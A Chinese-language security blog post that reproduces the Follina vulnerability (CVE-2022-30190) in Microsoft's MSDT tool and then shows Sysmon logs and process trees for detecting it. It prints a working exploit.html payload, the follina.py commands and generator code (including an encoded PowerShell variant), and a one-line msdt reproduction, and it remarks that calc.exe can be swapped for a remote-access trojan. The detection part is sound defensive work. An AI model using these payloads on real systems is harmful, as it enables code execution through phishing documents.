漏洞描述:CVE-2022-30190: Microsoft Windows 支持诊断工具(MSDT)远程代码执行漏洞
漏洞价值:==》以前发钓鱼邮件恶意office附件还要用户启动宏,这个漏洞比较高级!完全不需要,看来黑产钓鱼邮件又有一场血雨腥风了。。。
CVE: CVE-2022-30190
组件: Microsoft Windows Support Diagnostic Tool(MSDT) Windows
漏洞类型: 代码执行
影响: 服务器接管
简述: 从 Word 等调用应用程序使用 URL 协议调用 MSDT 时存在远程执行代码漏洞。成功利用此漏洞的攻击者可以使用调用应用程序的权限运行任意代码。然后,攻击者可以安装程序、查看、更改或删除数据,或者在用户权限允许的上下文中创建新帐户。
漏洞原理见:https://www.bleepingcomputer.com/news/security/new-microsoft-office-zero-day-used-in-attacks-to-execute-powershell/
核心总结就是:恶意的Word文档,使用远程模板功能,以从一个远程服务器获取HTML文件。HTML代码然后使用微软的MS-MSDT URI协议执行PowerShell代码。当然从后面exploit.html源码看的确是:
<!doctype html> <html lang="en"> <head> <title> Good thing we disabled macros </title> </head> <body> <p> Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor. Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit. Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In quis lectus massa. Pellentesque quis pretium massa. Vivamus facilisis ultricies massa ac commodo. Nam nec congue magna. Nullam laoreet justo ut vehicula lobortis. Aliquam rutrum orci tortor, non porta odio feugiat eu. Vivamus nulla mauris, eleifend eu egestas scelerisque, vulputate id est. Proin rutrum nec metus convallis ornare. Ut ultricies ante et dictum imperdiet. Ut nisl magna, porttitor nec odio non, dapibus maximus nibh. Integer lorem felis, accumsan a dapibus hendrerit, maximus nec leo. Vestibulum porta, orci sed dignissim porta, sem justo porta odio, quis rutrum tortor arcu quis massa. Aenean eleifend nisi a quam faucibus, quis scelerisque lectus condimentum. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Proin non dui nec odio finibus molestie. Suspendisse id massa nunc. Sed ultricies et sapien vel fringilla. </p> <p> Donec tincidunt ac justo et iaculis. Pellentesque lacinia, neque at consectetur porttitor, leo eros bibendum lorem, eu sollicitudin dolor urna pharetra augue. Pellentesque facilisis orci quis ante tempor, ac varius eros blandit. Nulla vulputate, purus eu consectetur ullamcorper, mauris nulla commodo dolor, in maximus purus mi eget purus. In mauris diam, imperdiet ac dignissim ut, mollis in purus. In congue volutpat tortor eu auctor. Nullam a eros lectus. Aenean porta semper quam ac lacinia. Curabitur interdum, nisl eu laoreet tempus, augue nisl volutpat odio, dictum aliquam massa orci sit amet magna. Duis pulvinar vitae neque non placerat. Nullam at dui diam. In hac habitasse platea dictumst. Sed quis mattis libero. Nullam sit amet condimentum est. Nulla eget blandit elit. Nunc facilisis erat nec ligula ultrices, malesuada mollis ex porta. Phasellus iaculis lorem eu augue tincidunt, in ultrices massa suscipit. Donec gravida sapien ac dui interdum cursus. In finibus eu dolor sit amet porta. Sed ultrices nisl dui, at lacinia lectus porttitor ut. Ut ac viverra risus. Suspendisse lacus nunc, porttitor facilisis mauris ut, ullamcorper gravida dolor. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus sollicitudin, arcu id sagittis facilisis, turpis dolor eleifend massa, in maximus sapien dui et tortor. Quisque varius enim sed enim venenatis tempor. Praesent quis volutpat lorem. Pellentesque ac venenatis lacus, vitae commodo odio. Sed in metus at libero viverra mollis sed vitae nibh. Sed at semper lectus. </p> <p> Proin a interdum justo. Duis sed dui vitae ex molestie egestas et tincidunt neque. Fusce lectus tellus, pharetra id ex at, consectetur hendrerit nibh. Nulla sit amet commodo risus. Nulla sed dapibus ante, sit amet fringilla dui. Nunc lectus mauris, porttitor quis eleifend nec, suscipit sit amet massa. Vivamus in lectus erat. Nulla facilisi. Vivamus sed massa quis arcu egestas vehicula. Nulla massa lorem, tincidunt sed feugiat quis, faucibus a risus. Sed viverra turpis sit amet metus iaculis finibus. Morbi convallis fringilla tortor, at consequat purus vulputate sit amet. Morbi a ultricies risus, id maximus purus. Fusce aliquet tortor id ante ornare, non auctor tortor luctus. Quisque laoreet, sem id porttitor eleifend, eros eros suscipit lectus, id facilisis lorem lorem nec nibh. Nullam venenatis ornare ornare. Donec varius ex ac faucibus condimentum. Aenean ultricies vitae mauris cursus ornare. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas aliquet felis vel nulla auctor, ac tempor mi mattis. Nam accumsan nisi vulputate, vestibulum nisl at, gravida erat. Nam diam metus, tempor id sapien eu, porta luctus felis. Aliquam luctus vitae tortor quis consectetur. In rutrum neque sit amet fermentum rutrum. Sed a velit at metus pretium tincidunt tristique eget nibh. In ultricies, est ut varius pulvinar, magna purus tristique arcu, et laoreet purus elit ac lectus. Ut venenatis tempus magna, non varius augue consectetur ut. Etiam elit risus, ullamcorper cursus nisl at, ultrices aliquet turpis. Maecenas vitae odio non dolor venenatis varius eu ac sem. Phasellus id tortor tellus. Ut vehicula, justo ac porta facilisis, mi sapien efficitur ipsum, sit fusce. </p> <script> location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(\\windows\\system32\\calc)/.exe\""; </script> </body> </html>
==》核心:location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(\\windows\\system32\\calc)/.exe\"";
我们来复现下该漏洞过程,payload来源:
https://github.com/chvancooten/follina.py
运行方法:
C:\Users\bonel\Desktop\follina.py-main>python .\follina.py -t docx -m binary -b calc.exe Generated 'clickme.docx' in current directory Generated 'exploit.html' in 'www' directory Serving payload on http://localhost:80/exploit.html
然后浏览器打开:http://localhost:80/exploit.html 出现:
点击打开,最后弹出calc.exe进程,黑客可以将calc.exe换成远控木马,你懂得!
process explorer看到的进程树:
当然,还有一种最简单的复现方法,就是命令行直接执行:msdt ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc)/.exe"
在我win10里最后也弹出上述界面。
此外,如果是word里打开,则进程调用如下图,见 https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/
亲自试了下,win10 64环境,office LTSC 专业增强版本2021 复现了该漏洞,采集到的运行截图和进程信息:
进程树:
注意:如果是python .\follina.py -t rtf -m binary -b \windows\system32\calc.exe
修改成rtf格式也是可以的。进程树和上同。
如果是:python .\follina.py -t docx -m command -c calc.exe
则无非是payload不一样,源码分析:
if args.mode == "command": # Original PowerShell execution variant command = args.command.replace("\"", "\\\"") encoded_command = base64.b64encode(bytearray(command, 'utf-16-le')).decode('UTF-8') # Powershell life... payload = fr'''"ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{encoded_command}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\""''' if args.mode == "binary": # John Hammond binary variant binary_path = args.binary.replace('\\', '\\\\').rstrip('.exe') payload = fr'"ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$({binary_path})/.exe\""' print("payload:", payload)
但是进程树还是没啥区别。
-----------------------------------------------------------------------------------------------------------------------------
好了,我们来看下msdt是什么?然后看如何检测这类漏洞导致的攻击。
Microsoft Windows 支持诊断工具 (MSDT),官方介绍:
msdt
Invokes a troubleshooting pack at the command line or as part of an automated script, and enables additional options without user input.
Syntax
msdt </id <name> | /path <name> | /cab < name>> <</parameter> [options] … <parameter> [options]>>
Parameters
Parameter | Description |
---|---|
/id <packagename> |
Specifies which diagnostic package to run. For a list of available packages, see Available Troubleshooting packs. |
/path <directory|.diagpkg file|.diagcfg file> |
Specifies the full path to a diagnostic package. If you specify a directory, the directory must contain a diagnostic package. You cannot use the /path parameter in conjunction with the** /id**, /dci, or /cab parameters. |
/dci <passkey> |
Prepopulates the passkey field. This parameter is only used when a support provider has supplied a passkey. |
/dt <directory> |
Displays the troubleshooting history in the specified directory. Diagnostic results are stored in the user’s %LOCALAPPDATA%\Diagnostics or %LOCALAPPDATA%\ElevatedDiagnostics directories. |
/af <answerfile> |
Specifies an answer file in XML format that contains responses to one or more diagnostic interactions. |
/modal <ownerHWND> |
Makes the troubleshooting pack modal to a window designated by the parent Console Window Handle (HWND), in decimal. This parameter is typically used by applications that launch a troubleshooting pack. For more information about obtaining Console Window Handles, see How to Obtain a Console Window Handle (HWND). |
/moreoptions <true|false> |
Enables (true) or suppresses (false) the final troubleshooting screen that asks if the user wants to explore additional options. This parameter is typically used when the troubleshooting pack is launched by a troubleshooter that isn't part of the operating system. |
/param <parameters> |
Specifies a set of interaction responses at the command line, similar to an answer file. This parameter isn't typically used within the context of troubleshooting packs created with TSP Designer. For more information about developing custom parameters, see Windows Troubleshooting Platform.==>在命令行指定一组交互响应,....一堆巴拉巴拉的东西。。。核心:开发自定义参数!!! |
/advanced | Expands the advanced link on the Welcome page by default when the troubleshooting pack is started. |
/custom | Prompts the user to confirm each possible resolution before it is applied. |
好了,既然是自定义参数就好理解漏洞为啥产生了,应该是底层堆栈溢出了。
看看针对上述浏览器点击后,最终运行calc.exe数据采集,如下sysmon采集的数据:
1、最后一步,看到了calc.exe,
Process Create: RuleName: - UtcTime: 2022-06-02 02:57:11.385 ProcessGuid: {0bf95bee-2707-6298-f204-000000001000} ProcessId: 7856 Image: C:\Windows\System32\calc.exe FileVersion: 10.0.19041.1 (WinBuild.160101.0800) Description: Windows Calculator Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: CALC.EXE CommandLine: "C:\Windows\system32\calc.exe" CurrentDirectory: C:\Users\bonel\AppData\Local\Temp\SDIAG_9b730195-a334-4526-b858-efc005d7882d\ User: DESKTOP-92JS9SJ\bonel LogonGuid: {0bf95bee-19d3-6298-031c-090000000000} LogonId: 0x91C03 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: MD5=5DA8C98136D98DFEC4716EDD79C7145F,SHA256=58189CBD4E6DC0C7D8E66B6A6F75652FC9F4AFC7CE0EBA7D67D8C3FEB0D5381F,IMPHASH=8EEAA9499666119D13B3F44ECD77A729 ParentProcessGuid: {0bf95bee-2706-6298-ec04-000000001000} ParentProcessId: 1252 ParentImage: C:\Windows\System32\sdiagnhost.exe ParentCommandLine: C:\Windows\System32\sdiagnhost.exe -Embedding ParentUser: DESKTOP-92JS9SJ\bonel
可以看到其ParentImage: C:\Windows\System32\sdiagnhost.exe,就是诊断窗口弹出来那玩意。
2、当然诊断窗口会弹出一堆进程,比如:csc.exe
Process Create: RuleName: - UtcTime: 2022-06-02 02:57:11.265 ProcessGuid: {0bf95bee-2707-6298-f004-000000001000} ProcessId: 3924 Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe FileVersion: 4.8.4084.0 built by: NET48REL1 Description: Visual C# Command Line Compiler Product: Microsoft® .NET Framework Company: Microsoft Corporation OriginalFileName: csc.exe CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\bonel\AppData\Local\Temp\y2qzf0yf.cmdline" CurrentDirectory: C:\Users\bonel\AppData\Local\Temp\SDIAG_9b730195-a334-4526-b858-efc005d7882d\ User: DESKTOP-92JS9SJ\bonel LogonGuid: {0bf95bee-19d3-6298-031c-090000000000} LogonId: 0x91C03 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: MD5=F65B029562077B648A6A5F6A1AA76A66,SHA256=4A6D0864E19C0368A47217C129B075DDDF61A6A262388F9D21045D82F3423ED7,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D ParentProcessGuid: {0bf95bee-2706-6298-ec04-000000001000} ParentProcessId: 1252 ParentImage: C:\Windows\System32\sdiagnhost.exe ParentCommandLine: C:\Windows\System32\sdiagnhost.exe -Embedding ParentUser: DESKTOP-92JS9SJ\bonel
看到sdiagnhost.exe的:
Process Create: RuleName: - UtcTime: 2022-06-02 02:57:10.776 ProcessGuid: {0bf95bee-2706-6298-ec04-000000001000} ProcessId: 1252 Image: C:\Windows\System32\sdiagnhost.exe FileVersion: 10.0.19041.1 (WinBuild.160101.0800) Description: Scripted Diagnostics Native Host Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: sdiagnhost.exe CommandLine: C:\Windows\System32\sdiagnhost.exe -Embedding CurrentDirectory: C:\Windows\system32\ User: DESKTOP-92JS9SJ\bonel LogonGuid: {0bf95bee-19d3-6298-031c-090000000000} LogonId: 0x91C03 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: MD5=6A21B1893DDE94CB87BA56111375888A,SHA256=761815301A00D0B3A7BB4959A5004B623C55009CE701C6E867C96F468DC1323A,IMPHASH=88C840A970A1633DCA61E1CD2D926E21 ParentProcessGuid: {00000000-0000-0000-0000-000000000000} ParentProcessId: 728 ParentImage: - ParentCommandLine: - ParentUser: -
注意:ParentProcessId: 728
C:\Users\bonel>tasklist |findstr 728
svchost.exe 728 Services 0 19,376 K
3、这期间msdt.exe产生了一些ps1的临时文件
File created: RuleName: - UtcTime: 2022-06-02 02:57:10.685 ProcessGuid: {0bf95bee-2706-6298-eb04-000000001000} ProcessId: 2412 Image: C:\Windows\system32\msdt.exe TargetFilename: C:\Users\bonel\AppData\Local\Temp\SDIAG_9b730195-a334-4526-b858-efc005d7882d\VF_ProgramCompatibilityWizard.ps1 CreationUtcTime: 2022-06-02 02:57:10.685 User: DESKTOP-92JS9SJ\bonel
File created: RuleName: - UtcTime: 2022-06-02 02:57:10.685 ProcessGuid: {0bf95bee-2706-6298-eb04-000000001000} ProcessId: 2412 Image: C:\Windows\system32\msdt.exe TargetFilename: C:\Users\bonel\AppData\Local\Temp\SDIAG_9b730195-a334-4526-b858-efc005d7882d\TS_ProgramCompatibilityWizard.ps1 CreationUtcTime: 2022-06-02 02:57:10.685 User: DESKTOP-92JS9SJ\bonel
File created: RuleName: - UtcTime: 2022-06-02 02:57:10.685 ProcessGuid: {0bf95bee-2706-6298-eb04-000000001000} ProcessId: 2412 Image: C:\Windows\system32\msdt.exe TargetFilename: C:\Users\bonel\AppData\Local\Temp\SDIAG_9b730195-a334-4526-b858-efc005d7882d\RS_ProgramCompatibilityWizard.ps1 CreationUtcTime: 2022-06-02 02:57:10.685 User: DESKTOP-92JS9SJ\bonel
还有一个dll。。。
File created: RuleName: DLL UtcTime: 2022-06-02 02:57:10.685 ProcessGuid: {0bf95bee-2706-6298-eb04-000000001000} ProcessId: 2412 Image: C:\Windows\system32\msdt.exe TargetFilename: C:\Users\bonel\AppData\Local\Temp\SDIAG_9b730195-a334-4526-b858-efc005d7882d\DiagPackage.dll CreationUtcTime: 2022-06-02 02:57:10.685 User: DESKTOP-92JS9SJ\bonel
4、如果是命令行运行的msdt,则可以看到其父进程是cmd!
Process Create: RuleName: - UtcTime: 2022-06-02 02:57:10.632 ProcessGuid: {0bf95bee-2706-6298-eb04-000000001000} ProcessId: 2412 Image: C:\Windows\System32\msdt.exe FileVersion: 10.0.19041.1 (WinBuild.160101.0800) Description: Diagnostics Troubleshooting Wizard Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: msdt.exe CommandLine: msdt ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc)/.exe" CurrentDirectory: C:\Users\bonel\ User: DESKTOP-92JS9SJ\bonel LogonGuid: {0bf95bee-19d3-6298-031c-090000000000} LogonId: 0x91C03 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: MD5=992C3F0CC8180F2F51156671E027AE75,SHA256=6859D1B5D1BEAA2985B298F3FCEE67F0AAC747687A9DEC2B4376585E99E9756F,IMPHASH=3A1E8B78C984CDC6E669D871794AD160 ParentProcessGuid: {0bf95bee-1dbf-6298-e901-000000001000} ParentProcessId: 3792 ParentImage: C:\Windows\System32\cmd.exe ParentCommandLine: "C:\Windows\system32\cmd.exe" ParentUser: DESKTOP-92JS9SJ\bonel
通过cmd里运行msdt的进程树如下(火绒剑里的绘图):
可svchost.exe派生的sdiagnhost.exe!!!
5、如果是通过浏览器打开的诊断工具,则msdt.exe的父进程是msedge.exe,当然firefox啥的也可能。
Process Create: RuleName: - UtcTime: 2022-06-02 03:06:44.756 ProcessGuid: {0bf95bee-2944-6298-0d05-000000001000} ProcessId: 2076 Image: C:\Windows\System32\msdt.exe FileVersion: 10.0.19041.1 (WinBuild.160101.0800) Description: Diagnostics Troubleshooting Wizard Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: msdt.exe CommandLine: "C:\Windows\system32\msdt.exe" ms-msdt:/id系统找不到指定的设备。PCWDiagnostic系统找不到指定的设备。/skip系统找不到指定的设备。force系统找不到指定的设备。/param系统找不到指定的设备。设备不识别此命令。IT_RebrowseForFile=?系统找不到指定的设备。IT_LaunchMethod=ContextMenu系统找不到指定的设备。IT_BrowseForFile=/../../$(calc)/.exe设备不识别此命令。 CurrentDirectory: C:\Windows\system32\ User: DESKTOP-92JS9SJ\bonel LogonGuid: {0bf95bee-19d3-6298-031c-090000000000} LogonId: 0x91C03 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: MD5=992C3F0CC8180F2F51156671E027AE75,SHA256=6859D1B5D1BEAA2985B298F3FCEE67F0AAC747687A9DEC2B4376585E99E9756F,IMPHASH=3A1E8B78C984CDC6E669D871794AD160 ParentProcessGuid: {0bf95bee-19f1-6298-a000-000000001000} ParentProcessId: 7164 ParentImage: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe ParentCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 ParentUser: DESKTOP-92JS9SJ\bonel
好了,数据采集和溯源说完了,检测的思路也就出来了:
1、从cmd/msedge/office这些进程诞生的msdt.exe进程是可疑的。
2、msdt.exe里参数带有/../../xxxx/.exe,恶意payload。 ==》直接检测这个也是ok的!